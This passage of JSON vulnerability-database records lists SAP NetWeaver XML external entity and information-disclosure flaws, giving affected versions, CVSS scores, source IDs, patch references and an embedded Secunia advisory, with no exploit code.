"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201707-0530",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "as java 7.5"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.5"
},
{
"model": "knowledge management",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "97572"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006832"
},
{
"db": "NVD",
"id": "CVE-2017-11457"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-872"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-11457"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP",
"sources": [
{
"db": "BID",
"id": "97572"
}
],
"trust": 0.3
},
"cve": "CVE-2017-11457",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-11457",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-11457",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-11457",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-872",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006832"
},
{
"db": "NVD",
"id": "CVE-2017-11457"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-872"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XML external entity (XXE) vulnerability in com.sap.km.cm.ice in SAP NetWeaver AS JAVA 7.5 allows remote authenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request, aka SAP Security Note 2387249. SAP NetWeaver AS JAVA Is XML An external entity vulnerability exists. Vendors have confirmed this vulnerability SAP Security Note 2387249 It is released as.Information may be obtained. \nAttackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-11457"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006832"
},
{
"db": "BID",
"id": "97572"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-11457",
"trust": 2.7
},
{
"db": "BID",
"id": "97572",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006832",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-872",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "97572"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006832"
},
{
"db": "NVD",
"id": "CVE-2017-11457"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-872"
}
]
},
"id": "VAR-201707-0530",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:24:24.910000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "April 2017 (2387249)",
"trust": 0.8,
"url": "https://blogs.sap.com/2017/04/12/sap-cyber-threat-intelligence-report-april-2017/"
},
{
"title": "SAP NetWeaver AS JAVA Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=148143"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006832"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-872"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-611",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006832"
},
{
"db": "NVD",
"id": "CVE-2017-11457"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/97572"
},
{
"trust": 1.6,
"url": "https://erpscan.io/advisories/erpscan-17-018-sap-netweaver-java-7-5-xxe-com-sap-km-cm-ice/"
},
{
"trust": 1.1,
"url": "https://erpscan.com/advisories/erpscan-17-018-sap-netweaver-java-7-5-xxe-com-sap-km-cm-ice/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11457"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-11457"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2387249"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/04/11/sap-security-patch-day-april-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "97572"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006832"
},
{
"db": "NVD",
"id": "CVE-2017-11457"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-872"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "97572"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006832"
},
{
"db": "NVD",
"id": "CVE-2017-11457"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-872"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-11T00:00:00",
"db": "BID",
"id": "97572"
},
{
"date": "2017-09-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-006832"
},
{
"date": "2017-07-25T18:29:01.103000",
"db": "NVD",
"id": "CVE-2017-11457"
},
{
"date": "2017-07-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-872"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-25T12:11:00",
"db": "BID",
"id": "97572"
},
{
"date": "2017-09-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-006832"
},
{
"date": "2021-04-20T19:36:09.877000",
"db": "NVD",
"id": "CVE-2017-11457"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-872"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-872"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS JAVA In XML External entity vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006832"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-872"
}
],
"trust": 0.6
}
}
var-201709-1263
Vulnerability from variot
SAP NetWeaver is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-1263",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100717"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported the issue.",
"sources": [
{
"db": "BID",
"id": "100717"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an information-disclosure vulnerability.\nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.",
"sources": [
{
"db": "BID",
"id": "100717"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "100717",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "100717"
}
]
},
"id": "VAR-201709-1263",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:45:11.694000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2483143"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/09/12/sap-security-patch-day-september-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "100717"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100717"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100717"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100717"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100717"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Adapter Engine Cache Monitor Information Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "100717"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "100717"
}
],
"trust": 0.3
}
}
var-201210-0703
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. When SAP NetWeaver verifies the XML request, the PMI XML parser has an error. The attacker can exploit the vulnerability to construct a malicious XML document to induce the user to parse and obtain local file sensitive information. SAP NetWeaver is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: SAP NetWeaver XML External Entity Vulnerability
SECUNIA ADVISORY ID: SA51063
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51063/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51063
RELEASE DATE: 2012-10-26
DISCUSS ADVISORY: http://secunia.com/advisories/51063/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/51063/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=51063
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: ERPScan has reported a vulnerability in SAP NetWeaver, which can be exploited by malicious people to disclose potentially sensitive information. disclose local files.
SOLUTION: Reportedly a fix has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: Dmitry Chastukhin, ERPScan.
ORIGINAL ADVISORY: SAP: https://service.sap.com/sap/support/notes/1721309
ERPScan (DSECRG-12-037): http://erpscan.com/advisories/dsecrg-12-037-sap-netweaver-pmi-agent-configuration-xml-external-entity/
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201210-0703",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.1,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "IVD",
"id": "9b8a5e80-1f4e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-6147"
},
{
"db": "BID",
"id": "56281"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry Chastukhin of ERPScan",
"sources": [
{
"db": "BID",
"id": "56281"
},
{
"db": "CNNVD",
"id": "CNNVD-201210-815"
}
],
"trust": 0.9
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "9b8a5e80-1f4e-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "9b8a5e80-1f4e-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "9b8a5e80-1f4e-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. When SAP NetWeaver verifies the XML request, the PMI XML parser has an error. The attacker can exploit the vulnerability to construct a malicious XML document to induce the user to parse and obtain local file sensitive information. SAP NetWeaver is prone to an information-disclosure vulnerability. \nAn attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver XML External Entity Vulnerability\n\nSECUNIA ADVISORY ID:\nSA51063\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/51063/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51063\n\nRELEASE DATE:\n2012-10-26\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/51063/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/51063/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51063\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nERPScan has reported a vulnerability in SAP NetWeaver, which can be\nexploited by malicious people to disclose potentially sensitive\ninformation. disclose\nlocal files. \n\nSOLUTION:\nReportedly a fix has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nDmitry Chastukhin, ERPScan. \n\nORIGINAL ADVISORY:\nSAP:\nhttps://service.sap.com/sap/support/notes/1721309\n\nERPScan (DSECRG-12-037):\nhttp://erpscan.com/advisories/dsecrg-12-037-sap-netweaver-pmi-agent-configuration-xml-external-entity/\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-6147"
},
{
"db": "BID",
"id": "56281"
},
{
"db": "IVD",
"id": "9b8a5e80-1f4e-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "117713"
}
],
"trust": 1.08
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "56281",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2012-6147",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "51063",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201210-815",
"trust": 0.6
},
{
"db": "IVD",
"id": "9B8A5E80-1F4E-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "117713",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
